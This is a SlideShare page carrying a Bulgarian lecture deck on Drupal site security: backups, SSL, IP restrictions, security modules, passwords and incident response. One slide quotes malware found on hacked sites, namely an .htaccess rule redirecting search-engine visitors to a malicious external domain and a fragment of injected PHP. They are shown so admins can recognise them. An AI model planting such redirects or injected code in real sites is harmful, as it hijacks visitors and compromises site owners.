Drupal security lecture

2,175 views
2,127 views

Published on

A short brief on Drupal security in Bulgarian.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
2,175
On SlideShare
0
From Embeds
0
Number of Embeds
930
Actions
Shares
0
Downloads
3
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Drupal security lecture

  1. 1. СИГУРНОСТ В CMS DRUPAL Общи положения засигурност на Уеб сайтове София 10.02.2012 г. @init Lab
  2. 2. Мета – за сигурността на Уеб сайтаСигурността на Уеб сайта е задължение на администратора; тя е основна част от изграждането на сайта; дадена информация не съществува, ако не е налична на три места. @init Lab
  3. 3. Принципни положения при злонамерен достъп- изтриване на информация или подмяна настраница с друга и компрометиращо съдържание;- извличане на лични даннина потребителите в сайта;- пренасочване при достъпване от референтенсървър, към сайт с компрометиращо съдържание. @init Lab
  4. 4. Примери-злонамерен код в .htaccessRewriteEngine OnRewriteCond%{HTTP_REFERER} .*google.* [OR]RewriteRule ^(.*)$http://peace-security.ru/mod/index.php [R=301,L]- злонамерен код в PHP файловеglobal $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11";if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo"<script>document.cookie=".$sessdt_k."=".$sessdt_f.";</script>";... @init Lab
  5. 5. ПримериОбхождане на лош ботОпит за оторизиранена несъществуващпотребител @init Lab
  6. 6. Основни методи за защита на информацията и сайта:- използване на криптирана връзка за оторизация(SSL логин);- оторизация на потребителски роли по IP адрес;- акуратни права на потребителите в системата;- рестрикции относно форматите за въвеждане;- защита на формуляра за оторизация;- следене дневника (log) за възможни проблеми;- вграждане на модул за архивиране на базатаданни и файловете на сайта;- обновяване на ядрото/модули на системата; @init Lab
  7. 7. Основни методи за защита наинформацията и сайта - изисквания:- SSL (статичен ip адрес на хоста и генериране насертификат – собствен, от свободна институция,или от оторизиран източник). Инвестиция врамките на 24-50 лв на година със закупенсертификат. (http://cacert.org/ - собствен серт.)- статичен ip адрес за управление, влиза в пакетана някои Интернет достачици. Инвестиция врамките на 25-30 лв мес, обезпечава сигурноуправление на сайта. @init Lab
  8. 8. Основни методи за защита на информацията и сайта - модули:- SSL чрез ръчно пренасочване на адрес към httpsили чрез модул http://drupal.org/project/session443- ограничаване на достъпа на роля по ip адресhttp://drupal.org/project/restrict_by_ip- създаване на периодичен архив на базата даннии файловете на сайта (ръчно/автоматизирано)http://drupal.org/project/backup_migrate* не можах да инициализирам FTP сесия, cronувисва при scheduled backup (за последния модул) @init Lab
  9. 9. Проверка на сигурността на сайта модули- преглед на сигурността / действияhttp://drupal.org/project/security_review- определяне формати за въвежданеспоред ролята на потребителяhttp://drupal.org/project/better_formats- проверка състоянието на таблиците в базатаданни http://drupal.org/project/schema @init Lab
  10. 10. Екран от модула Security Review @init Lab
  11. 11. Защо паролата не е сигурен метод?- може да бъде открадната при използване нанекриптирана връзка;- сама по себе си не отговаря за самоличността навъвеждащия (приказката за Али Баба);- ако не е генерирана софтуерно е възможно дабъде с ниско ниво на сигурност (повтаряемост). @init Lab
  12. 12. Помощни приложения- ползвайте генератор на паролиhttp://pwgen-win.sourceforge.net/- криптирайте важната информация - като паролиза достъп до сървъри, на вашия компютърhttp://www.truecrypt.org/- при размяна на важни пароли по електроннатапоща използвайте шифроване на данните.http://www.gnupg.org/ @init Lab
  13. 13. Екран от приложението PW GenГенерирайтепаролитена своя компютър. @init Lab
  14. 14. Добрите и лошите- ботове = X маркер на Вашата врата- злонамерени потребители = Касим (Али Баба)- пробиващият Системата = Шеф на крадцитеМетоди за защита – следене на лог записите,блокиране на недобросъвестните потребители/ботове (автоматизирано) по IP адрес, ограничаванедостъпа на лоши ботове чрез .htaccess файлаhttp://blog.superhosting.bg/good-vs-bad-bots.html @init Lab
  15. 15. Да затворим вратата- ограничаване достъпа на ботове до сайта;http://en.linuxreviews.org/HOWTO_stop_automated_spam-bots_using_.htaccess- автоматизирано известяване за проблеми на сайта(модул http://drupal.org/project/logging_alerts) ;- блокиране на адреси при опит за brute force attackhttp://drupal.org/project/login_security; @init Lab
  16. 16. Екран занастройкаот модулаLogin Security @init Lab
  17. 17. При пробив в системата- ограничете достъпа до сайта само до себе си;- премахнете излишния софтуер от сървъра. - свържете се с хостинг компанията и проверетеза последния наличен архив;- влезте през задната врата (https:// до Вашия сървър)а не през парадния вход – Лошият е вътре;- сменете всички потребителски FTP и пароли иглавната за хост акаунта;- свалете базата данни и файловете на системата и гипрегледайте за злонамерен код – за OS Windows можеда ви послужи приложениетоhttp://code.google.com/p/dngrep/ @init Lab
  18. 18. Защо сигурни сайтове?- обезпечавате Вашия труд и инвестицията наклиента;- предотвратявате възможността Интернетстраницата да се използва злонамерено от третилица;- правите Мрежата по-сигурно място за всички. @init Lab
  19. 19. Допълнителна стойност на Вашия труд- можете да анализирате сайтове на клиенти занивото им на сигурност, срещу заплащане;- можете да имплементирате решения за сигурност;- можете да сключите договор за абонаментнаподдръжка, обновяване на системата и следене запроблеми в сигурността. @init Lab
  20. 20. Все още начинаещпо въпросите за сигурността Георги Атанасов novsait@novsait.eu http://www.novsait.eu Работи с Друпал и пише теми за версия 6.0, имлементира SEO и Сигурност на системата @init Lab

×